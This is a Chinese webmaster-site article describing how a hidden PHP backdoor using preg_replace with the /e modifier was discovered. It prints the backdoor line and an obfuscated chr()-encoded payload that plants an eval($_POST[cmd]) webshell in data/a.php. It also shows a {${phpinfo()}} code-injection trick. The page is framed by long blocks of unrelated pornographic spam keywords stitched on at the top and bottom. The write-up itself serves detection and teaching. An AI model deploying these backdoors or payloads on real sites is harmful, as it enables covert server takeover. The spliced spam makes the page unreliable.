亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际

17站長網

17站長網 首頁 安全 腳本攻防 查看內容

記一次發現利用preg_replace隱藏后門和后續探究

2022-9-27 08:54| 查看: 2422 |來源: 互聯網

事情是這樣的,朋友的網站的利用各種查找后門的工具都沒有發現php木馬。老是找不到,小黑的伎倆很高級,每次使用完畢總是把后門刪掉,但是每次都能繼續進來,總是找不到從哪進來的。這個著實讓人蛋疼。 后來,

事情是這樣的,朋友的網站的利用各種查找后門的工具都沒有發現php木馬。老是找不到,小黑的伎倆很高級,每次使用完畢總是把后門刪掉,但是每次都能繼續進來,總是找不到從哪進來的。這個著實讓人蛋疼。
 
后來,終于在日志中發現一絲蛛絲馬跡,通過我的分析,我發現一個IP總是很奇怪的POST數據到某個文件。然后一段時間后,此IP就訪問一個莫名奇妙文件,名字很顯眼明顯不是正常系統文件,而是PHP后門。但是很快使用完畢后門就被刪除了。
 
哈哈,遇到小黑蠻細心的。
 
然后通過分析發現,小黑的訪問的文件發現代碼:
 
@preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);
 
如果你看到這個代碼是不是有的也沒什么問題,但是,這個就是小黑的掩藏的惡意代碼和后門。隱蔽吧,基本上任何查殺軟件都查殺不到。
 
preg_replace函數原型:
 
mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])
 
特別說明:
 
/e 修正符使 preg_replace() 將 replacement 參數當作 PHP 代碼(在適當的逆向引用替換完之后)。提示:要確保 replacement 構成一個合法的 PHP 代碼字符串,否則 PHP 會在報告在包含 preg_replace() 的行中出現語法解析錯誤。
 
上面的代碼是POST接受數據要測試,比較麻煩,如果換成GET獲取數據的話。。。
 
舉例:
 
 echo preg_replace(“/test/e”,$_GET["h"],”jutst test”);
 
如果我們提交?h=phpinfo(),phpinfo()將會被執行(使用/e修飾符,preg_replace會將 replacement 參數當作 PHP 代碼執行)。
 
如果我們要POST的話,我們測試提交下面的代碼會怎么樣呢?
 
h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))
 
密文對應的明文是:
 
fputs(fopen(data/a.php,w),);
 
執行的結果是在/data/目錄下生成一個一句話木馬文件 a.php。
 
這個就恐怖了吧。。。。
 
再來一個有難度的例子:
 
 代碼如下:
function test($str)
{
}
echo preg_replace(“/s*[php](.+?)[/php]s*/ies”, ‘test(“\1″)’, $_GET["h"]);
?>

提交 ?h=phpinfo() ,phpinfo()會被執行嗎?
 
肯定不會。因為經過正則匹配后, replacement 參數變為’test(“phpinfo”)’,此時phpinfo僅是被當做一個字符串參數了。
 
有沒有辦法讓它執行呢?
 
當然有。在這里我們如果提交?h={${phpinfo()}},phpinfo()就會被執行。為什么呢?
 
在php中,雙引號里面如果包含有變量,php解釋器會將其替換為變量解釋后的結果;單引號中的變量不會被處理。
 
注意:雙引號中的函數不會被執行和替換。
 
在這里我們需要通過{${}}構造出了一個特殊的變量,’test(“{${phpinfo()}}”)’,達到讓函數被執行的效果(${phpinfo()}會被解釋執行)。
 
可以先做如下測試:
 
echo “{${phpinfo()}}”; phpinfo會被成功執行了。
 
所以,各位查找后門的時候注意查找下。
 
OK,說了那么多,也了解了,以上我給的代碼:
 
 @preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);
 
看似很正常的代碼,其實就是一個極度危險的代碼,隱藏頗深啊。哈哈。希望對大家有幫助
 
作者:合肥制造

本文最后更新于 2022-9-27 08:54,某些文章具有時效性,若有錯誤或已失效,請在網站留言或聯系站長:17tui@17tui.com
·END·
站長網微信號:w17tui,關注站長、創業、關注互聯網人 - 互聯網創業者營銷服務中心

免責聲明:本站部分文章和圖片均來自用戶投稿和網絡收集,旨在傳播知識,文章和圖片版權歸原作者及原出處所有,僅供學習與參考,請勿用于商業用途,如果損害了您的權利,請聯系我們及時修正或刪除。謝謝!

17站長網微信二維碼

始終以前瞻性的眼光聚焦站長、創業、互聯網等領域,為您提供最新最全的互聯網資訊,幫助站長轉型升級,為互聯網創業者提供更加優質的創業信息和品牌營銷服務,與站長一起進步!讓互聯網創業者不再孤獨!

掃一掃,關注站長網微信

大家都在看

    熱門排行

      最近更新

        返回頂部
        亚洲国产精品人久久,亚洲va国产日韩欧美精品色婷婷,久久久久88色偷偷,免费人成黄页在线观看国际
        美女一区二区三区在线观看| 欧美色图一区二区三区| 亚洲乱码国产乱码精品精的特点| 国产喂奶挤奶一区二区三区| 樱桃国产成人精品视频| 中文字幕人成不卡一区| 久久一区二区三区四区| 日韩精品综合一本久道在线视频| 日韩一级免费一区| 一区二区三区中文字幕电影| 亚洲丝袜自拍清纯另类| 成av人片一区二区| 五月激情六月综合| 国产精品久久久久久久久果冻传媒| 色婷婷av一区二区三区之一色屋| 午夜不卡av免费| 91麻豆精品国产| 中文字幕在线观看不卡| 国产亚洲成年网址在线观看| 蜜桃视频免费观看一区| 国产91精品入口| 成人免费va视频| 99久久99精品久久久久久| 色婷婷亚洲一区二区三区| 欧美群妇大交群的观看方式| 欧美视频一区在线观看| 日韩av成人高清| 欧美国产精品中文字幕| 国产一区二区视频在线播放| 91麻豆精品国产自产在线| 亚洲一区中文在线| 欧美在线影院一区二区| 亚洲亚洲人成综合网络| 丝袜亚洲精品中文字幕一区| 国产乱理伦片在线观看夜一区| 欧美国产日韩精品免费观看| 色域天天综合网| 国产精品99久久久久久似苏梦涵| 久久久亚洲高清| 欧美日韩精品一区二区三区四区 | 国产精品电影一区二区| 欧美午夜一区二区三区| 麻豆精品久久精品色综合| 日韩av午夜在线观看| 亚洲一区二区三区在线看| 色999日韩国产欧美一区二区| 精品国产在天天线2019| 亚洲制服丝袜在线| 欧美在线观看禁18| 丝袜诱惑亚洲看片| 精品久久国产字幕高潮| 国产69精品久久99不卡| youjizz国产精品| 99视频在线观看一区三区| 91精品国产色综合久久久蜜香臀| 国产欧美综合色| 蜜桃久久久久久| 久久久久久久久久久久电影| 日韩一级免费观看| 欧美午夜影院一区| 蜜臀av性久久久久蜜臀aⅴ四虎| 久久久久久久久久美女| 成人av综合一区| jlzzjlzz亚洲日本少妇| 一本久久a久久精品亚洲| 亚洲午夜久久久久| 欧美体内she精高潮| 国产99久久久国产精品| 亚洲综合男人的天堂| 亚洲精品一二三四区| 亚洲日本免费电影| 亚洲女与黑人做爰| 国产精品66部| 久久蜜桃av一区精品变态类天堂| 蜜臀99久久精品久久久久久软件| 日韩亚洲欧美在线| 国产成人精品综合在线观看| 欧美经典三级视频一区二区三区| 国产精品国产自产拍在线| 国产精品青草久久| 欧美mv日韩mv国产| 国产精品国产精品国产专区不片| 亚洲欧美色综合| 菠萝蜜视频在线观看一区| 久久99热这里只有精品| 亚洲精品成人精品456| 国产偷国产偷亚洲高清人白洁| 91激情在线视频| 亚洲欧美一区二区三区极速播放| 日韩在线一区二区| 99久久99久久久精品齐齐| 欧美精品欧美精品系列| 91在线看国产| 亚洲精品一区二区精华| 久久综合久久综合久久综合| 日韩欧美成人一区二区| 国产精品热久久久久夜色精品三区 | 日韩黄色免费电影| 国产精品美女久久久久久久久 | 88在线观看91蜜桃国自产| 国产欧美一区二区精品性色| 久久影音资源网| 色综合中文字幕| 精品国产乱码久久久久久久| 91在线观看高清| 欧美一区二区在线不卡| 国产欧美日韩三区| 久久精品日韩一区二区三区| 波多野结衣亚洲| 在线一区二区三区四区五区 | 国内精品在线播放| 激情综合网av| 蜜臀av性久久久久蜜臀av麻豆 | 亚洲国产精品久久久久婷婷884| 亚洲美腿欧美偷拍| 亚洲一区二区三区不卡国产欧美| 亚洲电影中文字幕在线观看| 3d动漫精品啪啪| 美女一区二区久久| 久久亚洲捆绑美女| 国产精品传媒在线| 欧美性色综合网| 国产精品欧美久久久久无广告| 国产成人久久精品77777最新版本 国产成人鲁色资源国产91色综 | 国产一区日韩二区欧美三区| 中文字幕中文字幕在线一区| 久久久久久久综合色一本| 国产一二精品视频| 久久久电影一区二区三区| 午夜影视日本亚洲欧洲精品| 欧美伊人精品成人久久综合97| 一二三四区精品视频| 欧美丝袜丝交足nylons图片| 首页综合国产亚洲丝袜| 欧美日韩高清在线播放| 精品国产91乱码一区二区三区| 中文字幕精品综合| 日韩激情视频在线观看| 一区二区三区免费看视频| 97超碰欧美中文字幕| 一区二区理论电影在线观看| 成人av网址在线| 久久精品这里都是精品| 国产综合色在线| 国产精品一区二区在线播放| 亚洲一区二区在线观看视频| 亚洲免费观看视频| 欧美性感一区二区三区| 18成人在线观看| 国产精品美女一区二区三区| 欧美色图在线观看| 国产一区二区视频在线| 亚洲线精品一区二区三区八戒| 日韩高清在线不卡| 亚洲国产综合在线| 日本一区二区在线不卡| 精品国产免费人成在线观看| 日韩精品视频网| 粉嫩av一区二区三区| 亚洲一区在线观看网站| 国产三区在线成人av| 国产伦精品一区二区三区视频青涩 | 国产成人亚洲综合色影视| 欧美图片一区二区三区| 一区二区三区小说| av在线一区二区| 国产欧美日韩不卡免费| 国产经典欧美精品| 777色狠狠一区二区三区| 欧美精品电影在线播放| 欧美激情综合五月色丁香| 一区二区三区av电影| 国产成人免费视频精品含羞草妖精| 欧美一区二区精品在线| 精品成人免费观看| 日本亚洲欧美天堂免费| 99精品欧美一区二区蜜桃免费| 久久午夜老司机| 亚洲制服丝袜av| 午夜视频在线观看一区二区三区| 国产蜜臀97一区二区三区| 免费一区二区视频| 日韩高清在线不卡| 91原创在线视频| 国产精品二三区| 青青青伊人色综合久久| 欧美国产欧美亚州国产日韩mv天天看完整 | 精品日本一线二线三线不卡| 宅男噜噜噜66一区二区66| 在线日韩一区二区| 国内精品国产成人国产三级粉色| 日韩精品一二三| 亚洲国产日韩在线一区模特| 国产欧美日韩精品在线| 国产精品视频麻豆| 日韩高清在线电影| 91精品欧美久久久久久动漫 | 中文字幕中文字幕一区二区| 国产黄色91视频| 久久网站热最新地址|